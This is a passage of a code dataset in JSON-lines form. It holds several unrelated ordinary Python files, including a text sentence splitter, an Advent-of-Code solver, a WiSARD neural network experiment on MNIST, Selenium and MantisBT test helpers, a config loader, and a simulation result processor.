os.path\n\nclass DocumentStream:\n \"\"\"\n This class handles file read and write tasks.\n \"\"\"\n\n def __init__(self, filename):\n self.filename = filename\n\n def readWhole(self):\n \"\"\"\n This method read from a file and returns a list of Sentence objects.\n \"\"\"\n try:\n if os.path.isfile(self.filename) == False:\n raise dse.DocumentStreamError(\"Not a file!\")\n except dse.DocumentStreamError as E:\n print(E.data)\n exit()\n\n f = open(self.filename, 'r')\n\n fileString = f.read()\n f.close()\n\n #fileString = [c for c in fileString if c not in ['\\n', '\\t']] # Remove all returns in the string\n\n sentenceList = []\n sent = ''\n spaceState = False\n\n\n ### If char is .!?; or new line, append sentence to sentenceList\n ### and reset sentence to empty string.\n\n for char in fileString:\n if char in ['\\n', '\\t']:\n char = ' '\n\n if char == ' ':\n if spaceState == True and sent != '':\n sentenceList.append(sentence.Sentence(sent))\n sent = ''\n elif spaceState == False:\n sent += char\n spaceState = True\n else:\n spaceState = False\n sent += char\n if char in '.!?;' and sent != '':\n sentenceList.append(sentence.Sentence(sent))\n sent = ''\n\n if sent != '':\n sentenceList.append(sentence.Sentence(sent))\n\n ### Handles the case that a sentence begins or ends with a space character.\n '''\n for i in sentenceList:\n if i.sentence[0] == ' ':\n i = sentence.Sentence(i.sentence[1:])\n if i.sentence[-1] == ' ':\n i = sentence.Sentence(i.sentence[:-1])\n '''\n\n return sentenceList\n\n def gutenberg(self, sentences):\n \"\"\"\n Returns the title and author information for a Gutenberg article.\n \"\"\"\n titleFound = False\n authorFound = False\n i = 0\n\n while not titleFound or not authorFound:\n if len(sentences[i].parseWords()) != 0 and not titleFound and sentences[i].parseWords()[0] == 'Title:':\n titleFound = True\n title = ' '.join(sentences[i].parseWords()[1:])\n\n if len(sentences[i].parseWords()) != 0 and not authorFound and sentences[i].parseWords()[0] == 'Author:':\n authorFound = True\n author = ' '.join(sentences[i].parseWords()[1:])\n\n i += 1\n\n return title, author\n\n\n def writeWhole(self, document):\n \"\"\"\n This method takes a Document object as input, and writes it into a file,\n with one sentence per output line.\n \"\"\"\n sentenceString = ''\n\n for sent in document._Document__sentence:\n sentenceString += sent.sentence + sent.punctuation + '\\n'\n\n newFilename = self.filename[:-4] + '_copy.txt'\n f = open(newFilename, 'w')\n f.write(sentenceString)\n f.close()\n","sub_path":"documentStream.py","file_name":"documentStream.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"401393410","text":"# Substance Batchtools SBSCOOKER module\r\n# Supports *.sbs only\r\n\r\nclass IOOptions(object):\r\n\r\n def __init__(self):\r\n self.inputs = []\r\n self.includes = \"\"\r\n self.alias = \"\"\r\n self.outputName = r\"{inputName}\"\r\n self.outputPath = \"\"\r\n self.merge = False\r\n self.noArchive = False\r\n\r\n\r\nclass CookingOptions(object):\r\n\r\n def __init__(self):\r\n self.noOptimization = False\r\n self.sizeLimit = \"4\"\r\n self.exposeOutputSize = \"1\"\r\n self.exposeRandomSeed = \"1\"\r\n self.exposePixelSize = \"0\"\r\n","sub_path":"BatchtoolsPy/BatchtoolsPy/sbscooker.py","file_name":"sbscooker.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319777217","text":"def analyze_xmas(xmas):\n preamble_size = 25\n preamble = []\n weakness = None\n i = 0\n\n while i < len(xmas):\n # add each number to the preamble list\n preamble.append(xmas[i])\n\n # check length of the preamble to see if analysis is required\n if len(preamble) > preamble_size:\n has_weakness = True\n target_number = preamble[-1]\n j = 0\n\n # analyze the target number with the values from preamble\n while j < len(preamble):\n compliment = target_number - preamble[j]\n if compliment in preamble:\n has_weakness = False\n j += 1\n\n # check to see if a weakness was found\n if has_weakness:\n weakness = target_number\n break\n\n # remove the first value from preamble to accommodate preamble size\n preamble = preamble[1:]\n\n i += 1\n return weakness\n\n\ndef main():\n xmas = []\n\n with open('input.txt') as file:\n for line in file:\n xmas.append(int(line))\n\n weakness = analyze_xmas(xmas)\n print(\"Weakness value:\", weakness)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"day 9/day_9_p1.py","file_name":"day_9_p1.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"610279105","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport struct\nimport timeit\nfrom numba import njit,jit,vectorize\nfrom numba import cuda\nimport numpy as np\n#import struct\nimport random\n#import matplotlib\nimport tensorflow as tf #i have tensorflow in the system, the tensorflow environment is also there\n #i am able to activate it in terminal by (conda activate tensorflow_gpuenv)\n #i am able to import it in gedit python file after that \n #but i am not able to import it in the anacoda(in this file)\n\n\n#def readFiles(labelsFilePath, imagesFilePath):\n# flImg = open(imagesFilePath, 'rb')\n# flLbl = open(labelsFilePath, 'rb')\n# (mNumberImg, sizeImg, height, width) = struct.unpack('>IIII', flImg.read(16))\n# (mNumberLbl, sizeLbl) = struct.unpack('>II', flLbl.read(8))\n# imgs = []\n# labels = map(ord, flLbl.readlines()[0])\n# for i in range(sizeImg):\n# imgs.append({'img': map(ord, list(flImg.read(width*height))), 'label': labels[i]})\n# flImg.close()\n# flLbl.close()\n# return imgs\n\n#@vectorize\n#@jit\n@jit \ndef preprocessing(tx_train, ty_train, tx_test, ty_test):\n \n py_train = ty_train.flatten()\n py_test = ty_test.flatten()\n \n# px_test = [l.tolist() for l in tx_test]\n# px_train = [l.tolist() for l in tx_train]\n# print(px_test) \n \n px_test = tx_test.reshape(10000,784)\n px_train = tx_train.reshape(60000,784)\n #print(py_test)\n #print(px_train.shape)\n \n return px_train, py_train, px_test, py_test\n\n\n@jit\ndef concatenate_list_data(list):\n result= ''\n for element in list:\n result += str(element)\n return result\n\n@jit\ndef discriminator():\n# tt=0\n discriminator = []\n accumulated_pos = []\n my_list = list(range(0,784))\n for i in range(10): #10\n #print(1)\n ram = []\n #n_0 = [1990]\n# taken = []\n random.shuffle(my_list) #with this we can access every pixels of the image\n# n_0 =[]\n for j in range((int)((nodes))): #98 \n \n total_pos = []\n# total_pos1 = []\n positions = []\n \n #for k in range(no_of_rand_pix_selec): #8\n positions = my_list[j*8:j*8+8] #with this we can access every pixels of the image\n #print(positions)\n# for k in range(no_of_rand_pix_selec): #8\n## # this is wrong as for every ram in a discriminator this will reset\n# n = random.randint(1, input_size) #and we want it to reset after 98 ram of one discriminator\n# #but computer hange if i do it. so check later\n# for i in n_0:\n# if n != i:\n# positions.append(n) \n \n# n_0.append(n)\n# print(n_0)\n# if taken.count(n) == 0:\n# positions.append(n) \n #taken.append(n) \n \n #if tt < 1:\n # print(positions)\n # tt = tt + 1\n accumulated_pos.append(positions)\n total_pos = np.vstack(positions)\n #print(total_pos)\n \n table = []\n dictionary = {}\n max = len(\"{0:b}\".format(2**len(total_pos))) - 1\n for i in range(2**len(total_pos)):\n x = (('0' * max) + \"{0:b}\".format(i))\n x = x[len(x)-max:]\n dictionary[x] = 0\n #table.append({x: 0}) \n table.append(dictionary)\n \n# if tt < 1:\n# print(table)\n \n ram.append(table)\n \n discriminator.append(ram)\n# if tt <1:\n# print(discriminator)\n# tt = tt + 1\n #print(accumulated_pos[0])\n return discriminator, accumulated_pos\n \n \ndef train_discriminator_with_bleaching(myarray,myarray2,x_train, y_train):\n \n images = x_train\n lable = y_train \n \n for i,image in enumerate(images):\n# print(image)\n l = lable[i]\n num = l #have to check how to do it after i do the preprocessing part and see the dataset lable type\n all_ram_of_selected_discriminator = myarray[num]\n #print(all_ram)\n t_ratina = myarray2[(98*num):(98*num+98)]\n #print(t_ratina)\n for x,r in enumerate(all_ram_of_selected_discriminator): #here i want to iterate the ram of the perticular discriminator\n #print(x,r)\n #pattern_to_con = total_pos[r] # here i want to take only the positions of the node of that discriminator\n #print(x,r)\n ratina_for_one_ram = t_ratina[x]\n #print(ratina_for_one_ram)\n #for i in (0,len(ratina_for_one_ram)):\n # print(i)\n threshold = 0 # this define the threshold. right now if any one pixel in ratina(8) is >=1 then the value\n n = [] #saved is 1. if we want to chnage it we can \n for pix in ratina_for_one_ram: #like if value of 5 pixel is>=1 then save 1\n if image[(pix-1)]>=1:\n n.append(1)\n threshold = threshold + 1\n else:\n n.append(0)\n #print(n)\n \n address_of_that_ram = concatenate_list_data(n)\n #print(address_of_that_ram)\n #print(threshold)\n \n if threshold >= 1: #refer above comment\n for index,key in enumerate(r[0]):\n #print(1)\n #print(key)\n if key == address_of_that_ram:\n r[0][key] += 1\n #print(key)\n #print(index)\n #print(2)\n# r[address_of_that_ram] += 1\n# print(address_of_that_ram)\n# print(r[address_of_that_ram])\n# else:\n# print()\n #print(x,r[0])\n #address_of_one_ram = ','.join(n)\n #print(address_of_one_ram)\n \n return myarray\n#@vectorize(int(int,int,int,int))\ndef test_discriminator_with_bleaching(myarray,myarray2,x_test,y_test):\n right = 0\n wrong = 0\n images = x_test\n lable = y_test\n non_rec = 0\n \n for i,image in enumerate(images):\n actual_lable = lable[i]\n #sum_of_ram_output = []\n# print(image)\n total_sum=[]\n# total_sum_of_all_ram=[]\n for index,dis in enumerate(myarray):\n t_ratina = myarray2[(98*index):(98*index+98)]\n \n sum_of_ram_output = 0\n for x,r in enumerate(dis):\n ratina_for_one_ram = t_ratina[x]\n \n n = [] \n for pix in ratina_for_one_ram:\n if image[(pix-1)]>=1:\n n.append(1)\n else:\n n.append(0)\n #print(n)\n \n address_of_that_ram = concatenate_list_data(n)\n #print(address_of_that_ram)\n \n \n for index,key in enumerate(r[0]):\n if key == address_of_that_ram and r[0][key]>=1:\n #print(111)\n #print(key,r[0][key])\n sum_of_ram_output += 1\n \n \n total_sum.append(sum_of_ram_output)\n# print(1)\n print(total_sum)\n \n if max(total_sum) >= 1:\n index_of_dis = total_sum.index(max(total_sum))\n if index_of_dis == actual_lable:\n right += 1\n #print(1)\n else:\n wrong += 1\n #print(0)\n \n else:\n #wrong += 1\n non_rec += 1\n \n print(1) \n print(\"non recognized images = \", non_rec)\n \n \n return right,wrong\n\n\n\nif __name__ == \"__main__\":\n\n # the mnist has 28*28(784) pixels that we need to train in the discriminator\n # we have to initialize 10 discriminator for 0 to 9 number images(one discriminator for one pattern)\n # We are taking \n #\n \n input_size = 28*28\n no_of_rand_pix_selec = 8 \n nodes = input_size/no_of_rand_pix_selec #98\n #print(nodes)\n #n = random.randint(1, input_seize)\n #print(n)\n \n# imagesTrainingFile = 'train-images-idx3-ubyte'\n# labelsTrainingFile = 'train-labels-idx1-ubyte'\n# imagesTestFile = 't10k-images-idx3-ubyte'\n# labelsTestFile = 't10k-labels-idx1-ubyte'\n# \n# training = readFiles(labelsTrainingFile, imagesTrainingFile)\n# \n# for i in range(3):\n# print(training[i])\n \n x_train1 = np.random.randint(10, size=784)\n x_train2 = np.random.randint(10, size=784)\n x_train3 = np.random.randint(10, size=784)\n x_train = [x_train1,x_train2,x_train3]\n y_train = [0,1,2] \n #print(x_train[0])\n \n \n x_test1 = np.random.randint(10, size=784)\n #print(x_test1)\n x_test2 = np.zeros(784) #use this for accuracy = 0 check\n x_test = [x_train1,x_test1,x_test2] #use this for accuracy = 100 check\n# print(x_test)\n y_test = [0,1,2]\n #print(x_test[0],x_test1)\n \n #d = []\n d, acc_pos = discriminator()\n \n print(type(d))\n print(type(d[0]))\n print(type(d[0][0][0]))\n \n dictlist = []\n #i am trying to make list into array so that i can use numba\n \n for key, value in d[0][0][0].items():\n temp = [key,value]\n dictlist.append(temp)\n \n print(dictlist)\n \n myarray = np.asarray(dictlist, dtype = int)\n myarray2 = np.asarray(acc_pos, dtype = int)\n \n #print(d[0][0])\n #print(acc_pos)\n #print(x_train)\n (tx_train, ty_train), (tx_test, ty_test) = tf.keras.datasets.mnist.load_data()\n px_train, py_train, px_test, py_test = preprocessing(tx_train, ty_train, tx_test, ty_test)\n \n #print(px_train)\n \n# print(px_test[0].shape)\n \n \n train_the_network = train_discriminator_with_bleaching(myarray,myarray2,px_train[0:5000],py_train[0:5000])\n #print(view)\n #print(x_test[1])\n #print(d[0][0])\n right,wrong = test_discriminator_with_bleaching(myarray,myarray2,px_test[0:1000],py_test[0:1000])\n print(\"number of right result = \",right)\n print(\"number of wrong results = \",wrong)\n \n accuracy = ((right)/(right+wrong))*100\n print(\"accuracy by testing the model =\",accuracy)\n \n \n# print(x_test.shape)\n# print(y_test.shape)\n \n# print(ty_test.shape)\n# ty_test.flatten()\n# print(ty_test)\n# print(tx_train[0].flatten().shape)\n# print(tx_train[0].flatten())\n #print(timeit.timeit(discriminator())) ","sub_path":"code/fail_wisard_implimentation_on_cpu.py","file_name":"fail_wisard_implimentation_on_cpu.py","file_ext":"py","file_size_in_byte":11445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"540479050","text":"from models.project import Project\nimport random\nimport string\n\n\ndef random_string(maxlen):\n symbols = string.ascii_letters\n return \"\".join(\n [random.choice(symbols) for i in range(random.randrange(maxlen))])\n\n\ndef test_create_project(app):\n project = Project(name=random_string(20), description=random_string(20))\n app.session.login(\"administrator\", \"root\")\n old_projects = app.soap.get_projects_list(\"administrator\", \"root\")\n\n for p in old_projects:\n if p.name == project.name:\n project = Project(name=random_string(20),\n description=random_string(20))\n\n app.project.create(project)\n new_projects = app.soap.get_projects_list(\"administrator\", \"root\")\n assert len(old_projects) == len(new_projects) - 1\n assert project in new_projects\n","sub_path":"tests/test_create_project.py","file_name":"test_create_project.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"482713638","text":"# coding=utf8\n\nimport getopt\nfrom selenium import webdriver\n\nclass Chat(object):\n ROBOT_LIBRARY_SCOPE = 'GLOBAL'\n\n def __init__(self,url):\n self.url = url\n\n def usage(self):\n print (u'请输入通道参数,例如输入: -x /a')\n s = input('>>>')\n s = s.split()\n opts, args = getopt.getopt(s, 'x:', ['filename='])\n try:\n for opt, arg in opts:\n if opt in ('-x', '--filename'):\n name = arg\n return name\n except getopt.GetoptError as e:\n print (e)\n exit()\n\n # 初始化\n def SetupWebTest(self,driveType='chrome'):\n if driveType == 'chrome':\n self.cur_wd = webdriver.Chrome()\n elif driveType == 'firefox':\n self.cur_wd = webdriver.Firefox()\n else:\n raise Exception('unknow type of webdrive %s' % driveType)\n self.cur_wd.implicitly_wait(5)\n\n # 关闭浏览器\n def TearDownWebTest(self):\n self.cur_wd.quit()\n\n def LoginWebSite(self,name):\n self.cur_wd.get(self.url)\n self.cur_wd.find_element_by_css_selector('#subscribe').clear()\n self.cur_wd.find_element_by_css_selector('#subscribe').send_keys(name)\n self.cur_wd.find_element_by_css_selector('#username').send_keys('test')\n self.cur_wd.find_element_by_css_selector('#joinButton').click()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"code/untitled1/实际项目脚本开发/chat/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426627672","text":"## Config: Saving Method: Dict, Json, INI\n\n\n'''\nDescription: \n This file is to be used for initializing main execution file.\nFunction this file Contains:\n - \n'''\n\n# ----------------------------------------------- Loading Libraries ----------------------------------------------- #\n# pip3 install ConfigParser\nimport configparser\nimport json,os,ast\nfrom txt0_GeneralFunc import custom_ast_lit_eval\n# from _editable_configuration_dict import config as config_dict\n\nclass ProcessConfigDict:\n \n def __init__(self, config_dict):\n self.conf_dict = config_dict\n \n @staticmethod\n def config_string_cleaner(content):\n '''\n Sometimes content are not read by ast.literal_eval hence this function sort some of \n the error to make it work\n '''\n if isinstance(content, str):\n # print('>>>>>Cleaning the string')\n things_to_remove = ['\\n']\n for ele in things_to_remove:\n content = str(content).replace(ele, ' ')\n return ' '.join([ele for ele in content.split(' ') if len(ele)>0])\n else:\n return content\n\n @staticmethod\n def check_dict_and_get_keys(variable):\n if isinstance(variable, dict):\n return True, list(variable.keys())\n else:\n return False, ProcessConfigDict.config_string_cleaner(variable)\n\n def generate_mod_dict(self):\n '''\n modifying the dictory so that it will be easy to work with json or ini \n Input: takes multi level Dict\n Output: Single Level Dictionary where keys has been concatinated with '.' as seperator\n\n Sample:\n {\n 'a': 1,\n 'b': {\n 'c': \"[1,2,3]\",\n 'd': 'asd'\n },\n 'e': 'qwerty'\n }\n\n to\n\n {\n 'a': 1,\n 'b.c': \"[1,2,3]\",\n 'b.d': 'asd',\n 'e': 'qwerty'\n }\n\n '''\n key_path, mconf_dict = [], {}\n c0 = self.check_dict_and_get_keys(self.conf_dict)\n if c0[0]:\n for k0 in c0[1]:\n key_path.append(k0)\n c1 = self.check_dict_and_get_keys(self.conf_dict[k0])\n if c1[0]:\n for k1 in c1[1]:\n key_path.append(k1)\n c2 = self.check_dict_and_get_keys(self.conf_dict[k0][k1])\n if c2[0]:\n for k2 in c2[1]:\n key_path.append(k2)\n c3 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2])\n if c3[0]:\n for k3 in c3[1]:\n key_path.append(k3)\n c4 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2][k3])\n if c4[0]:\n for k4 in c4[1]:\n key_path.append(k4)\n c5 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2][k3][k4])\n if c5[0]:\n for k5 in c5[1]:\n key_path.append(k5)\n c6 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2][k3][k4][k5])\n if c6[0]:\n for k6 in c6[1]:\n key_path.append(k6)\n c7 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2][k3][k4][k5][k6])\n if c7[0]:\n for k7 in c7[1]:\n key_path.append(k7)\n c8 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2][k3][k4][k5][k6][k7])\n if c8[0]:\n msg = 'Dictionary contains More than 8 Levels. WHich is not supported Hence Raising Error'\n raise Exception(msg)\n else:\n print('.'.join(key_path))\n mconf_dict['.'.join(key_path)] = c8[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c7[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c6[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c5[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c4[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c3[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c2[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c1[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c0[1]\n \n ## Changing the case of keys so that it matched the config_ini\n new_mod_dict = {}\n for key in mconf_dict.keys():\n new_mod_dict[key.lower()] = mconf_dict[key]\n \n self.modified_config_dict = new_mod_dict\n # return mconf_dict\n \n \n def get_original_config_dict(self):\n return self.conf_dict\n \n def get_modified_config_dict(self):\n self.generate_mod_dict()\n return self.modified_config_dict\n \n def get_config_json(self):\n '''\n if you want to reformat and save the json \n ## Validate the Json at https://jsonlint.com/\n '''\n print('https://jsonlint.com/')\n self.generate_mod_dict()\n #print(json.dumps(self.modified_config_dict))\n return json.dumps(self.modified_config_dict)\n \n def write_json_config(self, loc = '../config/configuration_json.json'):\n '''\n get the modified_config_dict and write a json config file \n '''\n if os.path.exists('/'.join(loc.split('/')[:-1])):\n self.generate_mod_dict()\n json.dump(self.modified_config_dict, open(loc, 'w'))\n else:\n raise Exception('Provided path doesn\\'t exist.')\n \n def write_ini_config(self, loc = '../config/configuration_ini.ini'):\n '''\n get the modified_config_dict and write a json config file \n '''\n if os.path.exists('/'.join(loc.split('/')[:-1])):\n self.generate_mod_dict()\n\n parser = configparser.ConfigParser()\n parser.add_section('config')\n for key in self.modified_config_dict.keys():\n parser.set('config', key, self.modified_config_dict[key])\n parser.write(open(loc, 'w'))\n else:\n raise Exception('Provided path doesn\\'t exist.')\n #for section in config.keys():\n # parser.add_section(section)\n # for key in config[section].keys():\n # parser.set(section, key, str(config[section][key]))\n\n# config_instance = ProcessConfigDict(config_dict)\n# # config_instance.get_original_config_dict()\n# # config_instance.get_modified_config_dict()\n# # print(config_instance.get_config_json())\n# config_instance.write_json_config()\n# config_instance.write_ini_config()\n\n\n\nclass Configuration:\n '''\n Get a list containing the location of the config files (py/json/ini) read the content\n and convert the content to dictionary and make the content available to be accessed\n \n ## https://realpython.com/instance-class-and-static-methods-demystified/\n '''\n \n def __init__(self, config_file_paths_li=['../config/configuration_json.json'], \n raise_key_not_found_Error=True, try_using_ast = True):\n for ele in config_file_paths_li:\n if os.path.exists(ele) is False:\n raise exception('THIS PATH \"{}\" DOES\\'T EXIST'.format(ele))\n self.config_file_paths_li = config_file_paths_li\n self.raise_key_not_found_Error = raise_key_not_found_Error\n self.try_using_ast = try_using_ast\n # self._config = config # set it to conf\n \n \n @staticmethod\n def _load_ini_file(path):\n ''' \n load single ini config file \n ----> dictionary is not well structure when the file is having multiple nested dict\n '''\n temp_dict = {}\n config = configparser.ConfigParser()\n config.read(path)\n for section in config.sections():\n temp_dict[section] = dict(config[section])\n\n return temp_dict['config']\n \n \n @staticmethod\n def _load_json_file(path):\n ''' load single json config file\n '''\n return json.load(open(path))\n \n \"\"\"\n @staticmethod\n def load_dict_file(path):\n ''' load single python config file containing dictionary\n ## Link: https://chrisyeh96.github.io/2017/08/08/definitive-guide-python-imports.html\n # from config.configuration_dict import config\n \n ##https://stackoverflow.com/questions/2220699/whats-the-difference-between-eval-exec-and-compile\n '''\n with open(path) as file:\n exec(compile(file.read(), '', 'exec'))\n return config\n \"\"\"\n \n \n def load_config_files(self):\n '''\n Loading the files provided in the file path list; raise error if some issue is there\n '''\n all_config_dict = {}\n \n print('\\nNote:\\tWhen multiple configuration files will be provided and they might have some duplicate keys\\\n \\n\\tthen then the priority to the config will be provided to the one configwhich was provided\\\n \\n\\tat the start of the \"config_file_paths_li\".\\n')\n \n for path in self.config_file_paths_li[::-1]: ## reversing the list so that the first element can be given more priority\n if os.path.exists(path):\n file_type = path.split('.')[-1]\n # if 'py' == file_type:\n # temp_conf = load_dict_file(path)\n if 'json' == file_type:\n temp_conf = Configuration._load_json_file(path)\n elif 'ini' == file_type:\n temp_conf = Configuration._load_ini_file(path)\n else:\n raise Exception('Config file format not defined')\n \n if isinstance(temp_conf, dict):\n for key in temp_conf.keys():\n all_config_dict[key] = temp_conf[key]\n else:\n print('File Path Doesn\\'t exist')\n \n self._config = all_config_dict\n \n \n def get_config(self, *which_property):\n '''\n if raise_key_not_found_Error == False i.e. key is not present in config then returns None\n '''\n #self._load_config_files()\n config_prop = '.'.join([ ele.lower() for ele in which_property])\n \n if config_prop in list(self._config.keys()):\n if self.try_using_ast:\n try:\n custom_ast_lit_eval(self._config[config_prop])\n except SyntaxError:\n return self._config[config_prop]\n pass#print('Syntax Error. Therefore can\\'t return the value')\n else:\n return self._config[config_prop]\n else:\n msg = 'Key path Exception: NO property is present at this path: \\n\\t\\t{}'.format('> '+config_prop)\n print(msg)\n if self.raise_key_not_found_Error:\n raise Exception(msg)\n else:\n return None\n # ## When It was initailly nested dictionaries\n # which_property, traversed_path = self._config, []\n # for prop in list(which_property):\n # traversed_path.append(prop)\n # if prop in prop_to_return.keys():\n # prop_to_return = prop_to_return[prop]\n # else:\n # msg = 'Key path Exception: NO property is present at this path: \\n\\t\\t{}'.format('> '+'\\\\'.join(traversed_path))\n # print(msg)\n # if self.raise_key_not_found_Error:\n # raise Exception(msg)\n # else:\n # return None\n # return prop_to_return\n \n def get_keys_in_config(self):\n '''\n Return all the keys that are present in the config file\n '''\n #self._load_config_files()\n return list(self._config.keys())\n\n\n# conf = Configuration(raise_key_not_found_Error=True)\n# print(conf.get_keys_in_config())\n# conf.get_config('paths', 'raw_training_data_file')\n\n\n\n#-------------------------------------------------------\n\n# from AML00_GetConfig import ProcessConfigDict, Configuration\n# from _editable_configuration_dict import config as config_dict\n\n# stillworkingwithconfig = True\n# if stillworkingwithconfig:\n# config_instance = ProcessConfigDict(config_dict)\n# # config_instance.get_original_config_dict()\n# # config_instance.get_modified_config_dict()\n# # print(config_instance.get_config_json())\n# config_instance.write_json_config()\n# config_instance.write_ini_config()\n\n# conf = Configuration(['../config/configuration_json.json'], True,True)\n# conf.load_config_files()\n# #print(conf.get_keys_in_config())\n# conf.get_config('paths', 'raw_training_data_file')\n\n\n\n\n\n\n# def GetConfig(X, Y, msg = False):\n# '''\n# To get config value from config.ini Basic or Advance, config.ini is expected to have 2D structure\n# config_li <-- is a global list containing multiple config files.\n# No Error is raised when X == Config\n# msg == True: print execution messages\n# '''\n# val = []\n# # print(self.config_li)\n# # for conf in self.config_li:\n# # print(config_li)\n# for conf in config_li:\n# try:\n# val.append(conf[X][Y])\n# if msg is True: print('Using', conf['Config']['Type'], 'config, specificallly the pair ', X, Y)\n# except:\n# # print('NoVal')\n# pass\n# if X != 'Config':\n# if len(val) == 0: \n# raise Exception('configuration value NOT present in any file.')\n# elif len(val) > 1: \n# raise Exception('configuration value present in MULTIPLE file.')\n# else:\n# return val[0] ## first element in the list i.e. the value\n# return val ## used Just to return value when X=Config is used \n\n# # if __name__ == '__main':\n \n# # config_bas = configparser.ConfigParser()\n# # config_adv = configparser.ConfigParser()\n# # try:\n# # config_bas.read('../config/AAT_Config(basic).ini')\n# # config_adv.read('../config/AAT_Config(advance).ini')\n# # config_li = [config_adv, config_bas]\n# # print('Successfully read the configuration files :', GetConfig('Config', 'Type'))\n# # except:\n# # print('Unable to read config files. Hence Exiting.')\n# # sys.exit(1)","sub_path":"TwitterSentimentalAnalysis-master/bin/AML00_GetConfig.py","file_name":"AML00_GetConfig.py","file_ext":"py","file_size_in_byte":16374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"400344091","text":"import pandas as pd\nimport os\nimport numpy as np\nimport subprocess\nimport cv2\n\nfrom data_generation.lib.image_processing import post_process_image\n\n\n\nclass LaossResult():\n\n def __init__(self, path, laoss_tool_path=None,noise_folder = r\"/data/batg/noise_samples\"):\n self.path = path\n self.laoss_tool_path = laoss_tool_path\n self.noise_folder = noise_folder\n self.index = int(self.path.split('image')[-1])\n\n def rename_output(self, name):\n if '.Potential' in name:\n return 'v'\n elif '.ACPotential' in name:\n return 'dv'\n elif 'ShortCircuitCurrent' in name:\n return 'isc'\n elif 'Source Current' in name:\n return 'i'\n elif 'Wavelength' in name:\n return 'isc'\n else:\n return name\n\n\n def load_sweeps(self):\n # print(os.path.join(self.path, 'result'))\n with open(os.path.join(self.path, 'result', 'sweepdirmapping.txt')) as f:\n n_sweep = sum(1 for _ in f) - 1\n # try:\n if os.path.exists(os.path.join(self.path, 'result', 'sweepResult.txt')):\n self.data = pd.read_csv(os.path.join(self.path, 'result', 'sweepResult.txt'), delimiter='\\t', skiprows=4,\n header=0, nrows=n_sweep, usecols=[0,1, 2,3])\n self.data.rename(mapper=self.rename_output, axis='columns', inplace=True)\n\n self.data['i'] = self.data['i'] / (0.02 * 0.018)\n\n # print(self.data['i'])\n if 'isc' not in self.data.columns:\n self.data['isc'] = 0.0\n self.data['p'] = -self.data['i'] * self.data['v']\n self.data['sweep'] = pd.Series(dtype=np.float64)\n\n self.run_data = pd.read_csv(os.path.join(self.path, '.', 'Parameters.csv')).iloc[0]\n\n self.sweep_mapping = pd.read_csv(os.path.join(self.path, 'result', 'sweepdirmapping.txt'),\n delimiter='\\t').set_index('Path')\n self.sweep_mapping.rename(mapper=self.rename_output, axis='columns', inplace=True)\n for index, row in self.sweep_mapping.iterrows():\n index_filter = [True] * len(self.data)\n for value in self.sweep_mapping.columns:\n index_filter = index_filter & (np.isclose(self.data[value], row[value], atol=1e-4))\n self.data.loc[index_filter, 'sweep'] = index\n\n def run_laoss_tool(self,force_processing=False):\n\n for index, row in self.sweep_mapping.iterrows():\n\n sweep_results_folder = index\n i = sweep_results_folder.split('_')[1]\n if (not os.path.exists(os.path.join(self.path, \"current\" + str(i) + \".txt\")) and not os.path.exists(os.path.join(self.path, \"image\" + str(i) + \".npy\"))) or force_processing:\n output = subprocess.check_output(\n [self.laoss_tool_path, \"-p\", os.path.join(self.path, \"result\"), \"-o\",\n \"current\" + str(i) + \".txt\",\n \"-r\", str(sweep_results_folder),\n \"-n\", \"Luminance Iteration 0\", \"-e\", \"top\"\n , \"-t\", \"text\", \"--resolution\", \"800\"],\n cwd=self.path, stderr=subprocess.STDOUT).decode()\n\n if (not os.path.exists(os.path.join(self.path, \"potential\" + str(i) + \".txt\")) and not os.path.exists(os.path.join(self.path, \"image\" + str(i) + \".npy\"))) or force_processing:\n output = subprocess.check_output(\n [self.laoss_tool_path, \"-p\", os.path.join(self.path, \"result\"), \"-o\",\n \"potential\" + str(i) + \".txt\",\n \"-r\", str(sweep_results_folder),\n \"-n\", \"Potential_0 Iteration 0\", \"-e\", \"top\"\n , \"-t\", \"text\", \"--resolution\", \"800\"],\n cwd=self.path, stderr=subprocess.STDOUT).decode()\n\n try:\n output = subprocess.check_output(\n [self.laoss_tool_path, \"-p\", os.path.join(self.path, \"result\"), \"-o\",\n \"temperature\" + str(i) + \".txt\",\n \"-r\", str(sweep_results_folder),\n \"-n\", \"Temperature_0 Iteration 0\", \"-e\", \"top\"\n , \"-t\", \"text\", \"--resolution\", \"800\"],\n cwd=self.path, stderr=subprocess.STDOUT).decode()\n except:\n pass\n\n def pre_process_export_images(self, blur=1, noise_factor=0,image_dim=(100, 90),force_processing=False):\n for index, row in self.sweep_mapping.iterrows():\n sweep_results_folder = index\n i = 